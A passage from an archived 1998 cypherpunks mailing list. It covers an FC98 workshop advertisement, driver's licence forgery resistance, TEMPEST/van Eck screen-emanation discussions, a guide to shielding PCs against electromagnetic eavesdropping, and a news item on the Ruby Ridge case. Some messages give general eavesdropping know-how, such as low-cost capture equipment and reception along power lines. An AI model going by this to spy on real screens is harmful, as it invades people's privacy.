who has designed several algorithms and protocols. He pioneered research on
secure random number generators, differential related-key cryptanalysis on
block ciphers, and the chosen-protocol attack against cryptographic
protocols. His research has been presented at several international
conferences, and he has broken many proposed commercial cryptographic
algorithm, protocol, and system designs. Kelsey has a degree in Computer
Science and Economics from the University of Missouri Columbia.

Adam Shostack is Director of Technology for Netect, Inc, a Boston based
startup building state of the art server security management applications.
He has extensive background in designing, implementing and testing secure
systems for clients in the medical, computer, and financial industries. His
recent public work includes 'Apparent Weaknesses in the Security Dynamics
Client Server Protocol,' 'Source Code Review Guidelines,' and comparisons of
freely available cryptographic libraries.

Workshop Topics

   * Security on the Internet
        o Internet Protocols: IP, TCP, UDP
        o Higher-level Protocols: Telnet, FTP, HTTP, SSL
        o Solid Foundations for Cryptographic Systems
        o A History of Internet Attacks
        o Building Internet Firewalls
        o Building a Bastion Host
        o Turning your Bastion Host into a Web Server
        o Non-internet Internet Security
   * Cryptography
        o The Need for Cryptography
        o History of Cryptography
        o Classical Methods
        o Modern Methods
        o Private and Public Key Cryptography
        o Authentication vs. Security
        o Certification and Public Key Infrastructures
        o Cryptographic Protocols
        o Engineering a Cryptographically Secure System
        o Why Cryptography is Harder than it Looks
        o Security Through Obscurity and How to Recognize Snake Oil
   * Internet Payment Systems
        o Payment models: coin-based, cheque-based, account-based
        o Security Issues
        o Privacy and Anonymity Issues
        o Smartcards vs. Software
        o Existing Payment Schemes
             + credit cards
             + First Virtual
             + CyberCash
             + DigiCash
        o Forthcoming Payment Schemes
             + SET
             + Mondex
             + Millicent
             + micropayments
   * Setting Up an ecash-Enabled Web Server
        o Setting up the Web Server
        o Signing up for ecash
        o Installing the ecash Module
        o Setting Prices
        o Logging
        o Advanced Methods
             + ecashiers
             + moneychangers

The price of the workshop is $5,000 U.S. You can pay for your FC98 workshop
ticket with Visa or MasterCard, with ecash, or with any of a number of other
internet commerce payment protocols, at the regstriation site:
<http://fc98.ai/>. Please register and make your plane and hotel
reservations as soon as possible; workshop space is extremely limited.

The workshop price includes meals (but not lodging) at the InterIsland Hotel
and lab space, plus the delivery and installation of hardware, network
access, internet commerce software, all to a location like Anguilla. And, of
course, 40 hours of instruction and structured lab activity. We have priced
the workshop to be competitive with other comprehensive business and
professional technology workshops of similar total session length.

In addition, the first ten FC98 workshop participants will receive a 50%
reduction in their FC98 Conference and Exhibition fee, for a savings of $500
off the $1,000 conference admission.

You can register, and pay for, your workshop ticket at <http://fc98.ai/>.

Air Transportation and Hotels

Air travel to Anguilla is typically done through San Juan or St.
Maarten/Martin. There are several non-stop flights a day from various US and
European locations. Connection through to Anguilla can be made through
American Eagle, or through LIAT, or in the case of St. Maarten, with a short
ferry ride to Anguilla. See your travel agent for details.

Anguilla's runway is 3600 feet, with a displaced threshold of 600 feet, and
can accomodate business jets. Obviously, you should talk to your aviation
staff for details about your own aircraft's capabilities in this regard.

Anguilla import duties are not imposed on hardware or software which will
leave the island again, so, as long as you take it with you when you leave,
you won't pay import duties.

Please Note: Your FC98 Workshop fee only covers meals at the InterIsland
Hotel. The InterIsland is actually a small guesthouse attached to a large
conference facility, and so rooms there are in short supply. Fortunately,
there are lots of small hotels and guesthouses nearby. For more information
on these hotels, please see <http://fc98.ai/> for more information.

Other hotels on Anguilla range from spartan to luxurious, all within easy
walking or driving distance of the Workshop at the InterIsland. More
information about Anguillan hotels can be obtained from your travel agent,
or at <http://fc98.ai/>.

Registration and Information for Other FC98 Events

To register and pay for your ticket to the FC98 conference itself, see:
<http://fc98.ai/>

For information the selection of papers for the FC98 conference see:
<http://www.cwi.nl/conferences/FC98>

If you're interested in Exhibition space, please contact Blanc Weber:
<blancw@cnw.com>

If you're interested in sponsoring FC98, also contact Blanc Weber:
<blancw@cnw.com>

Financial Cryptography '98 is held in cooperation with the International
Association for Cryptologic Research. The conference proceedings will be
published by Springer Verlag in their Lecture Notes in Computer Science
(LNCS) series.

The FC98 Organizing Committee:

   * Vince Cate and Bob Hettinga, General Chairs
   * Ray Hirschfeld, Conference Chair
   * Matt Franklin, Conference Co-Chair
   * Ian Goldberg, Workshop Chair
   * Blanc Weber, Exhibit and Sponsorship Manager

And our sponsors...

   * RSA Data Security Inc. <http://www.rsa.com/>
   * C2NET, Inc. <http://www.c2.net/>
   * Hansa Bank & Trust Company Limited, Anguilla <http://www.hansa.net/>
   * Sicherheit und Privat- International Bank
   * Offshore Information Services <http://www.offshore.com.ai/>
   * e$ <http://www.shipwright.com/>

--- end forwarded text



-----------------
Robert Hettinga (rah@shipwright.com), Philodox
e$, 44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'
The e$ Home Page: http://www.shipwright.com/
Ask me about FC98 in Anguilla!: <http://www.fc98.ai/>






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mark Rogaski <wendigo@ne-wendigo.jabberwock.org>
Date: Tue, 10 Feb 1998 10:06:00 +0800
To: jinn@inetnebr.com
Subject: Re: Driver Licenses
In-Reply-To: <Pine.GSO.3.95.980209141656.9431B-100000@falcon>
Message-ID: <199802100200.VAA03490@deathstar.jabberwock.org>
MIME-Version: 1.0
Content-Type: text



-----BEGIN PGP SIGNED MESSAGE-----

An entity claiming to be D'jinnie wrote:

: 
: How exactly can they require for the DL to be magnetized if only a few
: states do that? My NE license is just a piece of photographed paper
: encased in plastic. The only thing that "protects" it from forgery is a
: "Don't Drink and drive" and "buckle up Nebraska" silvery warnings that can
: be seen under certain angles. I don't see them changing it anytime
: soon...thank gods for slow ppl ;) So...seems like there can and will be a
: lawsuit against such practices.
: 

Nice to see D'Jinn jumping in ...

Here in the Peoples Republik ov NJ, the DL's have no magstrips.  But, 
being that it is NJ, they're probably not far away.  An interesting point
is that, when I moved (intrastate), the MVS sent a decal with the new
address to stick on the back.  No re-issue necessary, which is good, since
most bars/liquor stores will not accept licenses marked DUP.  But, they
will accept passports.

Also interesting is that PA has recently (within the past 2-4 years) been
issuing DL's with the driver's SSN.

Mark

- -- 
[] Mark Rogaski                   "That which does not kill me
[] wendigo@pobox.com                 only makes me stranger."
[]
[]      finger wendigo@deathstar.jabberwock.org for PGP key
[] anti spambot: postmaster@localhost abuse@localhost uce@ftc.gov

-----BEGIN PGP SIGNATURE-----
Version: PGP for Personal Privacy 5.0
Charset: noconv

iQEVAwUBNN+01XzbrFts6CmBAQFkyAf/ZVF3rpjdjTLYQNJ9K6PO/B3HRovlKgba
FgmBkTcJKCH4yJPK0KC+RJzQ26B2S4SwKXvWYN46cQypTb6KgRiqpxRXBF7qo8Nt
yFebMXv4q/wHCh9Vg8uNeEOSAqq18meZcFy6ZwoeaSMZ3W2aIgCiWoF2fF+zFLu0
EDMxKLEgJtLBWS1HPHeU7XRQX5swu/Ud6rF5pN7m8qCZNPvjuUOL+5yCQGjYEKZp
gqJt7gtl1UgmvVkbX+dkbAG07/m3ACWbxspn1u1/NFwBFpJwM95D/Md/FYAa3rpc
XZy7LtZKqSrk6CwHPDWNpz/fPEnsmJG13DROMeD4340mjO0ZnS5/5g==
=xMsm
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Markus Kuhn <Markus.Kuhn@cl.cam.ac.uk>
Date: Tue, 10 Feb 1998 05:26:56 +0800
To: cypherpunks@ssz.com
Subject: Re: TEMPEST
In-Reply-To: <199802091735.LAA21910@einstein.ssz.com>
Message-ID: <E0y20QG-00015B-00@heaton.cl.cam.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain



Jim Choate wrote on 1998-02-09 17:35 UTC:
> This is the hardest since the actual modulation of the e-beam is done via a
> screen grid (who said tube theory was out of date?) and that signal is quite
> small and generaly has a cardoid emission pattern aligned axialy along the
> central axis of the CRT tube.

Things are somewhat more complicated and I am not convinced that
the e-beam is the primary source of radiation. Your claim that
the Tempest radiation is modulated by the screen grid does not agree with
my practical experience: All signals I get are close to harmonics of
the dot clock and not of the screen grid rate. In addition, the
Tempest monitor cannot distinguish between an all-black and an all-white
image, which it should in the case of a screen-grid caused modulation.
If there is indeed a screen-grid modulation, then it is *much* weaker
than any modulation that you get by software dithering.

Monitors are pretty strange antennas: For instance, my monitor still
radiates quite well (although noticeably weaker) if I switch its power
supply off. Just the passive resonance of the chassis gives a clear
signal in around a meter radius with a simple untuned dipole antenna.
Switching off a monitor alone does not protect you from eavesdropping
a VDU signal, especially if the signal is not just text but a pattern
optimized for reception.

After I unplug the VGA cable however, I can't pick up any signal with
our Tempest receiver unless I bring the antenna almost in contact with
the cable or connector. The closed PC chassis also appears to be no very
big source of VDU emanations, certainly much below the levels that
our receiver can detect.

Markus

-- 
Markus G. Kuhn, Security Group, Computer Lab, Cambridge University, UK
email: mkuhn at acm.org,  home page: <http://www.cl.cam.ac.uk/~mgk25/>






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <anon@anon.efga.org>
Date: Tue, 10 Feb 1998 10:20:48 +0800
To: cypherpunks@cyberpass.net
Subject: The Wit and Wisdom of Tim May
Message-ID: <0084d7fee26e9320dae1eb7da281a57b@anon.efga.org>
MIME-Version: 1.0
Content-Type: text/plain






















From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Frantz <frantz@netcom.com>
Date: Tue, 10 Feb 1998 14:32:17 +0800
To: cypherpunks@cyberpass.net
Subject: How to TEMPEST for less
Message-ID: <v0311070eb10594796b54@[207.94.250.77]>
MIME-Version: 1.0
Content-Type: text/plain



>From my archives:

----------------------------------------
Preventing Electromagnetic Eavesdropping


---------
NOTE: Even though the author of this document uses the term "TEMPEST" at
      various points, he certifies that his text consists of general
      concepts to reduce electromagnetic emissions, and was not based on any
      actual TEMPEST specifications or data.  Further questions on this topic
      should be directed to the author, "grady@netcom.com".

                                   -- PRIVACY Forum Moderator
---------


                                Abstract

Eavesdropping on personal computers is not limited to looking over the
shoulder of the operator or physically tapping in to an Ethernet cable.
U.S. Government standards relating to the prevention of information capture
via the emission of electromagnetic radiation from computers and peripherals
are known as TEMPEST.  However, actual TEMPEST specifications are classified.

TEMPEST aside, there are inexpensive and easily applied means for
individuals to minimize unintentional emissions from equipment.  My document
"Preventing Electromagnetic Eavesdropping," discusses these techniques.

Grady Ward   <grady@netcom.com>

---------

Preventing Electromagnetic Eavesdropping

A note discussing the prevention of electromagnetic eavesdropping
of personal computers.

Grady Ward   <grady@netcom.com>
public key verification by PK server, finger, or by request

Version 1.0   22 March 93

TEMPEST is the code name for technology related to limiting unwanted
electromagnetic emissions from data processing and related equipment.
Its goal is to limit an opponent's capability to collect information about
the internal data flow of computer equipment. Most information concerning
TEMPEST specifications is classified by the United States Government and
is not available for use by its citizens.

The reason why TEMPEST technology is particularly important for
computers and other data processing equipment is the kinds of signals
components in a computer use to talk to each other ("square waves") and
their clock speeds (measured in megahertz) produce a particularly rich set
of unintentional signals in a wide portion of the electromagnetic spectrum.
Because the spurious emissions occupy so wide a portion of that spectrum,
technologies used to block one portion of the spectrum (as pulling the shades
closed on a window to stop the visible light portion) are not necessarily
effective in another portion.

Unintentional emissions from a computer system can be captured and
processed to reveal information about the target systems from simple
levels of activity to even remotely copying keystrokes or capturing
monitor information. It is speculated that poorly protected systems can
be effectively monitored up to the order of one kilometer from the target
equipment.

This note will examine some practical aspects of reducing the
susceptibility of your personal computer equipment to remote monitoring
using easily-installed, widely available after-market components.


   I

One way of looking at TEMPEST from the lay person's point-of-view is
that it is virtually identical to the problem of preventing electromagnetic
interference ("EMI") by your computer system to others' radios, televisions,
or other consumer electronics. That is, preventing the emission of wide-band
radio "hash" from your computers, cabling, and peripherals both prevents
interference to you and your neighbors television set and limits the useful
signal available to a person surreptitiously monitoring.

Viewing the problem in this light, there are quite a few useful documents
available form the government and elsewhere attacking this problem and
providing a wealth of practical solutions and resources. Very useful for the
lay person are:

Radio Frequency Interference: How to Find It and Fix It. Ed Hare, KA1CV
and Robert Schetgen, KU7G, editors
The American Radio Relay League, Newington , CT
ISBN 0-87259-375-4  (c) 1991, second printing 1992

Federal Communications Commission Interference Handbook
(1991)
FCC Consumers Assistance Branch
Gettysburg, PA  17326
717-337-1212
and
MIL-STD-188-124B in preparation
(includes information on military shielding of tactical
communications systems)
Superintendent of Documents
US Government Printing Office
Washington, DC  20402
202-783-3238

Information on shielding a particular piece of consumer
electronic equipment may be available from the:

Electronic Industries Association (EIA)
2001 Pennsylvania Ave NW
Washington, DC  20006


Preventing unintended electromagnetic emissions is a relative term.
It is not feasible to reduce to zero all unintended emissions. My personal
goal, for example, might be to reduce the amount and quality of spurious
emission until the monitoring van a kilometer away would have to be in my
front yard before it could effectively eavesdrop on my computer. Apartment
dwellers with unknown neighbors only inches away (through a wall) might
want to even more carefully adopt as many of the following suggestions as
possible since signal available for detection decreases as approximately the
inverse square of the distance from the monitoring equipment to your computer.


   II
   Start with computer equipment that meets modern standards for emission.

In the United States, the "quietest" standard for computers and peripherals
is known as the "class B" level. (Class A level is a less stringent standard
for computers to be use in a business environment.).

You want to verify that all computers and peripherals you use meet the class
B standard which permits only one-tenth the power of spurious emissions than
the class A standard. If you already own computer equipment with an FCC ID,
you can find out which standard applies. Contact the FCC Consumers Assistance
Branch at 1-717-337-1212 for details in accessing their database.

Once you own good equipment, follow the manufacturer's recommendations for
preserving the shielding integrity of the system. Don't operated the system
with the cover off and keep "slot covers" in the back of the computer in
place.


   III
   Use only shielded cable for all system interconnections.

A shielded cable surrounds the core of control wires with a metal braid or
foil to keep signals confined to that core. In the late seventies it was common
to use unshielded cable such as "ribbon" cable to connect the computer with,
say, a diskette drive. Unshielded cable acts just like an antenna for signals
generated by your computer and peripherals. Most computer manufacturer
supply shielded cable for use with their computers in order to meet FCC
standards. Cables bought from third-parties are an unknown and should be
avoided (unless you are willing to take one apart to see for yourself!)

Try to avoid a "rat's nest" of wire and cabling behind your equipment and
by keeping all cables as short as possible. You want to reduced the length of
unintended antennas and to more easily predict the likely paths of electric
and magnetic coupling from cable to cable so that it can be more effectively
filtered.


   IV
   Block radiation from the power cord(s) into the house wiring.

Most computers have an EMI filter built into their body where the AC
line cord enters the power supply. This filter is generally insufficient to
prevent substantial re-radiation of EMI voltages back into the power wiring
of your house and neighborhood. To reduce the power retransmitted down
the AC power cords of your equipment, plug them in to special EMI filters
that are in turn plugged into the wall socket. I use a model 475-3
overvoltage and EMI filter manufactured by

Industrial Communication Engineers, Ltd.
P.O. Box 18495
Indianapolis, IN  46218-0495
1-800-ICE-COMM
ask for their package of free information sheets

(AC and other filters mentioned in this note are available from a wide
variety of sources including, for example, Radio Shack. I am enthusiastic
about ICE because of the "over-designed" quality of their equipment.
Standard disclaimers apply.)

This particular filter from ICE is specified to reduce retransmission of
EMI by a factor of at least 1000 in its high-frequency design range. Although
ideally every computer component using an AC line cord ought to be filtered,
it is especially important for the monitor and computer CPU to be filtered in
this manner as the most useful information available to opponents is believed
to come from these sources.


   V
   Block retransmitted information from entering your fax/modem or
   telephone line.

Telephone line is generally very poorly shielded. EMI  from your computer
can be retransmitted directly into the phone line through your modem or can
be unintentionally picked up by the magnetic portion of the EMI spectrum
through magnetic induction from power supplies or the yoke of your cathode
ray tube "CRT" monitor.

To prevent direct retransmission, EMI filters are specifically designed for
modular telephone jacks to mount at the telephone or modem, and for
mounting directly at the service entrance to the house.

Sources of well-designed telephone-line filter products include ICE
(address above) and

K-COM
Box 82
Randolph, OH  44265
216-325-2110

Your phone company or telephone manufacturer may be able to supply
you with free modular filters, although the design frequencies of these
filters may not be high enough to be effective through much of the EMI
spectrum of interest. Keep telephone lines away from power supplies of
computers or peripherals and the rear of CRTs:  the magnetic field often
associated with those device can inductively transfer to unshielded lines
just as if the telephone line were directly electrically connected to them.
Since this kind of coupling decreases rapidly with distance, this kind of
magnetic induction can be virtually eliminated by keeping as much distance
(several feet or more) as possible between the power supply/monitor yoke
and cabling.


   VI
   Use ferrite toroids and split beads to prevent EMI from escaping on
   the surface of your cables.

Ferrites are magnetic materials that,  for certain ranges of EMI
frequencies, attenuate the EMI by causing it to spend itself in heat in
the material rather than continuing down the cable. They can be applied
without cutting the cable by snapping together a "split bead" form over
a thick cable such as a power cord or by threading  thinner cable such as
telephone several times around the donut-shaped ferrite form. Every cable
leaving your monitor, computer, mouse, keyboard, and other computer
peripherals should have at least one ferrite core attentuator. Don't forget
the telephone lines from your fax, modem, telephone or the unshielded DC
power cord to your modem. Ferrites are applied as close to the EMI emitting
device as possible so as to afford the least amount of cable that can act as
an antenna for the EMI.


Good sources for ferrite split beads and toroids include

Amidon Associates, Inc.
P.O. Box 956
Torrance, CA  90508
310-763-5770
(ask for their free information sheet)

Palomar Engineers
P.O. Box 462222
Escondido, CA  92046
619-747-3343
(ask for their free RFI information sheet)

and Radio Shack.


   VII
   Other practical remedies.

Other remedies that are somewhat more difficult to correctly apply
include providing a good EMI "ground" shield for your computer equipment
and other more intrusive filters such as bypass capacitor filters.

You probably ought not to think about adding bypass capacitors unless you
are familiar with electronic circuits and digital design. While quite
effective, added improperly to the motherboard or cabling of a computer they
can "smooth out" the square wave digital waveform -- perhaps to the extent
that signals are interpreted erroneously causing mysterious "crashes" of
your system. In other cases, bypass capacitors can cause unwanted parasitic
oscillation on the transistorized output drivers of certain circuits which
could damage or destroy those circuits in the computer or peripherals. Also,
unlike ferrite toroids, adding capacitors requires actually physically
splicing them in or soldering them into circuits. This opens up the
possibility of electric shock, damage to other electronic components or
voiding the warranty on the computer equipment.

A good EMI ground is difficult to achieve. Unlike an electrical safety
ground, such as the third wire in a three-wire AC power system, the EMI
ground must operate effectively over a much wider part of the EMI spectrum.
This effectiveness is related to a quality known as electrical impedance. You
desire to reduce the impedance to as low a value as possible over the entire
range of EMI frequencies.

Unlike the AC safety ground, important factors in achieving low impedance
include having as short a lead from the equipment to a good EMI earth ground
as possible (must be just a few feet); the gauge of the connecting lead (the
best EMI ground lead is not wire but woven grounding "strap" or wide copper
flashing sheets; and the physical coupling of the EMI into the actual earth
ground. An 8 ft. copper-plated ground may be fine for AC safety ground, but
may present appreciable impedance resistance to an EMI voltage. Much better
would be to connect a network of six to eight copper pipes arranged in a
six-foot diameter circle driven in a foot or two into the ground,
electrically bonded together with heavy ground strap and connected to the
equipment to be grounded via a short (at most, several feet), heavy (at
least 3/4-1" wide) ground strap.

If you can achieve a good EMI ground, then further shielding possibilities
open up for you such as surrounding your monitor and computer equipment in a
wire-screen Faraday cage. You want to use mesh rather than solid sheet
because you must preserve the free flow of cooling air to your equipment.
Buy aluminum (not nylon) screen netting at your local hardware store. This
netting typically comes in rolls 36" wide by several feet long. Completely
surround your equipment you want to reduce the EMI being careful to make
good electrical bonds between the different panels of netting and your good
earth ground. I use stainless steel nuts, bolts, and lock washers along with
special non-oxidizing electrical paste (available from Electrical
contractors supply houses or from ICE) to secure my ground strapping to my
net "cages".  A good Faraday cage will add several orders of magnitude of
EMI attenuation to your system.


   VIII
   Checking the effectiveness of your work.

It is easy to get a general feeling about the effectiveness of your EMI
shielding work with an ordinary portable AM radio. Bring it very close to
the body of your computer and its cables in turn. Ideally, you should not
hear an increased level of static. If you do hear relatively more at one
cable than at another, apply more ferrite split beads or obtain better
shielded cable for this component. The practice of determining what kind of
operating system code is executing by listening to a nearby AM radio is
definitely obsolete for an well-shielded EMI-proof system!

To get an idea of the power and scope of your magnetic field emissions, an
ordinary compass is quite sensitive in detecting fields. Bring a compass
within a few inches of the back of your monitor and see whether it is
deflected. Notice that the amount of deflection decreases rapidly with
distance. You want to keep cables away from magnetic sources about as far as
required not to see an appreciable deflection on the compass.


   VIIII
   Summary

If you start with good, shielded equipment that has passed the FCC level B
emission standard then you are off to a great start. You may even be able to
do even better with stock OEM equipment by specifying "low-emission"
monitors that have recently come on the market in response to consumer fears
of extremely low frequency ("ELF") and other electromagnetic radiation.
Consistently use shielded cables, apply filtering and ferrite toroids to all
cabling entering or leaving your computer equipment. Finally, consider a
good EMI ground and Faraday cages. Beyond this there are even more effective
means of confining the electrical and magnetic components of your system
through the use of copper foil adhesive tapes, conductive paint sprays, "mu
metal" and other less common components.


Copyright (c) 1993 by Grady Ward. All Rights Reserved.
Permission is granted for free electronic distribution.

-------------------------------------------------------------------------
Bill Frantz       | Market research shows the  | Periwinkle -- Consulting
(408)356-8506     | average customer has one   | 16345 Englewood Ave.
frantz@netcom.com | teat and one testicle.     | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Back <aba@dcs.ex.ac.uk>
Date: Tue, 10 Feb 1998 12:24:01 +0800
To: Markus.Kuhn@cl.cam.ac.uk
Subject: attracting funding for tempest? (Re: SOFT TEMPEST)
In-Reply-To: <E0y1wKR-00084W-00@heaton.cl.cam.ac.uk>
Message-ID: <199802092134.VAA00795@server.eternity.org>
MIME-Version: 1.0
Content-Type: text/plain




In an interesting discussion on software tempest measures,

Markus Kuhn <Markus.Kuhn@cl.cam.ac.uk> writes:
> One more remark: This was so far unfunded research initiated by
> our private interest in the subject of compromising radiation. In
> this field, the available research literature is very close to zero
> (there are the van-Eck/Moeller/Smulder papers and that's it basically), and
> all the real knowledge is tightly guarded by the military and diplomatic
> community. We hope that developing commercial applications for
> compromising radiation will open the way to non-military funding
> and open research in this field.

People who are interested in communications and data security to the
extent of arguing about the difference in security offered by 56 bit
keys as compared to 128 bit keys ought to be worried about RF
information leaks and tempest shielding.

Perhaps similar justification can be used for the relevance of tempest
research -- it is just the hardware half of assuring confidentiality
of information.  There should be a reasonably large supply of
commercial funding candidates even given the 90 : 10 ratio of business
interest in availability over confidentiality.

> Copyright protections seems to be an interesting application.

Personally I view technology to assist copyright piracy a more
interesting research goal!  Candidate technologies include high
bandwidth eternity services, anonymous remailers with sufficient
bandwidth, pipenets, DC-nets, free software movements, countries
with modern intellectual ownership rules like Argentina*, and 
undermining the power of the state so that state provided copyright
enforcement susidies disappear.

(* See my previous post: reposted news report "ARGENTINE SUPREME COURT
RULES SOFTWARE PIRACY LEGAL").

I am not sure I want to see my computer narcing out over RF
frequencies what software is installed -- once enabled for corporates
there is the risk it will be used against individuals.  This sounds
about as (un)desirable as CPUs capable of running encrypted
instruction streams, with per CPU keys loaded at manufacture enabling
software to be purchased for your CPU only (and hence disempowering 
users who will thus be unable to even disassemble such code prior to
running), or smart cards as modernized next generation dongles.

Adam





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Tue, 10 Feb 1998 23:10:24 +0800
To: cypherpunks@ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: TEMPEST (fwd)
Message-ID: <199802100340.VAA27056@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Subject: Re: TEMPEST 
> Date: Tue, 10 Feb 1998 01:45:26 +0000
> From: Markus Kuhn <Markus.Kuhn@cl.cam.ac.uk>

> > If your getting your signal off the harmonics you're doing it the hard way.
> > Go back and re-read your texts on Fourier Transforms and then do a
> > power-spectrum analysis on the signals to the tube; what you will find is
> > that the primary frequencies get the majority of the signal (eg 1st harmonic
> > of a square wave (ie a dot clock) only gets, at best, 1/3 of the energy of
> > the primary).
> 
> But this is not necessarily, where the the monitor resonates nicely.
> Van Eck has reported very similar results in his paper: His VDU
> had a dot clock of 11 MHz and he got nice resonance peaks near 125
> and 210 MHz.

11MHz base frequency won't produce a clean ring at 125MHz or 210MHz, they're
not a whole number multiple of the base. How is this accounted for? What did
he calculate the Q at? At what range was he picking up these harmonics as
well as the base? The lower harmonic implies a 4MHz beat and the higher a
1MHz beat, how did he account for these signals? Personaly I would be more
inclined to suspect the information was riding on the beats. He didn't
happen to measure the frequencies to 3 decimal places did he? Since the
components are most likely 20%, 10% at best. This would indicate that his
base clock was slewing from around 10MHz to around 12MHz, this would explain
the 1MHz and 4MHz beats anyway; sub-harmonics due to excessive slew-rate.

If he was seeing ringing it had to be very low power because such off-integer
resonances only occur in low-Q tuned circuits and that implies a very quick
decay constant because the majority of energy is being dissipated in heat.
So, in effect, Van Eck is claiming that the propogation attenuation of the
125 and 210 harmonics is lower than for the fundamental frequencies in a
low-Q tuned circuit? Or is he claiming the emitted energy of the harmonics
was higher than the base drive signal?

> If you have only a van Eck style receiver, yes. But as soon as you record
> the reception over some time and observe the images phases to drift only
> slightly against each other, you might be able to separate them using
> similar processing techniques as used in computer tomography.

As I alluded to with the comment I made about integrating the received
signals. The easiest way to do this sort of stuff with a small budget is
with a flying capacitor integrator.


    ____________________________________________________________________
   |                                                                    |
   |       The most powerful passion in life is not love or hate,       |
   |       but the desire to edit somebody elses words.                 |
   |                                                                    |
   |                                  Sign in Ed Barsis' office         |
   |                                                                    | 
   |            _____                             The Armadillo Group   |
   |         ,::////;::-.                           Austin, Tx. USA     |
   |        /:'///// ``::>/|/                     http://www.ssz.com/   |
   |      .',  ||||    `/( e\                                           |
   |  -====~~mm-'`-```-mm --'-                         Jim Choate       |
   |                                                 ravage@ssz.com     |
   |                                                  512-451-7087      |
   |____________________________________________________________________|





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Tue, 10 Feb 1998 23:09:47 +0800
To: cypherpunks@ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: SOFT TEMPEST (fwd)
Message-ID: <199802100346.VAA27061@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Tue, 10 Feb 1998 03:03:53 +0100 (CET)
> From: Lucky Green <shamrock@cypherpunks.to>
> Subject: Re: SOFT TEMPEST (fwd)

> I don't know about displaying the screens of several thousands of PC's at
> a site, but you can easily select any given screen of several dozens of
> PC's. Using $100 worth in equipment plus a  [>>$100] quality frequency
> generator.

What is the $100 worth of equipment?

> At HIP'97, I watched a van Eck demonstration given by a German professor.
> Using cheap analog equipment and one of the better HP frequency

What equipment, not necessarily the manufacturer or model but the functional
description? Do you remember the configuration?

> I am told screen images can be captured up to 600 meters along the power
> line.

As long as there isn't a transformer in there. The impedance shift will
strongly attenuate the signal. This same limitation effects X-10 controllers.
If the PC's are plugged into a UPS (which they should be in a business)
you're SOL here.


    ____________________________________________________________________
   |                                                                    |
   |       The most powerful passion in life is not love or hate,       |
   |       but the desire to edit somebody elses words.                 |
   |                                                                    |
   |                                  Sign in Ed Barsis' office         |
   |                                                                    | 
   |            _____                             The Armadillo Group   |
   |         ,::////;::-.                           Austin, Tx. USA     |
   |        /:'///// ``::>/|/                     http://www.ssz.com/   |
   |      .',  ||||    `/( e\                                           |
   |  -====~~mm-'`-```-mm --'-                         Jim Choate       |
   |                                                 ravage@ssz.com     |
   |                                                  512-451-7087      |
   |____________________________________________________________________|





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Tue, 10 Feb 1998 20:36:49 +0800
To: cypherpunks@ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: the best justice money can buy --Lessig (fwd)
Message-ID: <199802100349.VAA27066@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Oops...

Forwarded message:

> From: Jim Choate <ravage@ssz.com>
> Subject: Re: the best justice money can buy --Lessig (fwd)
> Date: Mon, 9 Feb 1998 18:54:32 -0600 (CST)

> And in the long run non-copyrighted software has a significant market
                          ^^^^^^^^^^^
                          copy-protected

> advantage. It's smaller, it is more stable, and people don't get as pissed
> off when they want to make their backups.

Sorry.


    ____________________________________________________________________
   |                                                                    |
   |       The most powerful passion in life is not love or hate,       |
   |       but the desire to edit somebody elses words.                 |
   |                                                                    |
   |                                  Sign in Ed Barsis' office         |
   |                                                                    | 
   |            _____                             The Armadillo Group   |
   |         ,::////;::-.                           Austin, Tx. USA     |
   |        /:'///// ``::>/|/                     http://www.ssz.com/   |
   |      .',  ||||    `/( e\                                           |
   |  -====~~mm-'`-```-mm --'-                         Jim Choate       |
   |                                                 ravage@ssz.com     |
   |                                                  512-451-7087      |
   |____________________________________________________________________|





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Cordian <emc@wire.insync.net>
Date: Tue, 10 Feb 1998 12:12:27 +0800
To: cypherpunks@cyberpass.net
Subject: The Latest Horiuchi Antics
Message-ID: <199802100403.WAA29574@wire.insync.net>
MIME-Version: 1.0
Content-Type: text/plain



Now that the Feds have gotten the Horuichi case moved out of state
jurisdiction into a federal courtroom, they want their federal judge
to dismiss all charges.
 
-----
 
BOISE, Idaho (AP) The federal government on Monday sought the
dismissal of a state involuntary manslaughter charge against the FBI
sharpshooter who killed Randy Weaver's wife at Ruby Ridge six years
ago.
 
The Justice Department petition filed in federal court argued that Lon
Horiuchi was protected by the Supremacy Clause of the U.S.
Constitution so he cannot be subject to state prosecution for actions
in the line of duty.
 
"It is imperative that federal officials be protected from state
prosecution in such circumstances because without the protection
ensured by the Supremacy Clause, rigorous enforcement of federal law
would be severely chilled to the detriment of the general public
good,'' the petition said.
 
Horiuchi was among dozens of federal agents who surrounded Weaver's
remote mountain cabin in the Idaho Panhandle in August 1992 in an
attempt to arrest Weaver on an illegal weapons charge.
 
Weaver's 14-year-old son, Sam, and deputy U.S. Marshal William Degan
of Quincy, Mass., were killed in the gunfight that touched off the
11-day siege. Vicki Weaver was fatally shot by Horiuchi on the second
day.
 
Both Randy Weaver and family associate Kevin Harris were acquitted in
1993 of federal murder and other charges in connection with the siege.
Weaver was also acquitted of the weapons charge that had prompted
federal agents to confront him.
 
Last August, five years to the day after Mrs. Weaver's death,
prosecutor Denise Woodbury filed the involuntary manslaughter charge
against Horiuchi. The Justice Department had earlier declined to
prosecute Horiuchi.
 
The prosecutor also charged Harris with murder in Degan's death, but
